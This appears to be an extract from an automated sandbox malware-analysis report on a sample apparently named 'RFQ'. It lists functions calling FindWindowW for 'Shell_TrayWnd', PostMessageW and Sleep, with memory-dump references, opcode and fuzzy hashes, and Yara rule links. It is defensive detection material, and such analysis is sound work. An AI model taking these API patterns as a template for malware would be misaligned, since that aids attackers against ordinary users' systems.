                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007986E2
                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 007986E9
                                                                                                                                                      • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 138d9741fbbd51b29268dc516376364bcf55d6ff84b22bcdc86289a693b9e6e4
                                                                                                                                                    • Instruction ID: 00d31b0a49f8f7b58872bf6ba01a0bc4307388c206017cf160f88efdc6eb6c71
                                                                                                                                                    • Opcode Fuzzy Hash: 138d9741fbbd51b29268dc516376364bcf55d6ff84b22bcdc86289a693b9e6e4
                                                                                                                                                    • Instruction Fuzzy Hash: 49D0A931381314BBF23863309C0FFC62A089B08B10F008A14B609EA1C0C8A8AD10CA28
                                                                                                                                                    Function 00798698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007986A2
                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007986B5
                                                                                                                                                      • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 09d45611bed1af533c86c06592fa02836893ec274b40c768c06886e9e452b35d
                                                                                                                                                    • Instruction ID: 6a6597a57e7ca6c0d124cd922e665983552123ee39549454cd225a7a83ce34b6
                                                                                                                                                    • Opcode Fuzzy Hash: 09d45611bed1af533c86c06592fa02836893ec274b40c768c06886e9e452b35d
                                                                                                                                                    • Instruction Fuzzy Hash: 19D0A931384314B7E23863309C0FFC62A089B04B10F008A14B609AA1C0C8A8AD10CA28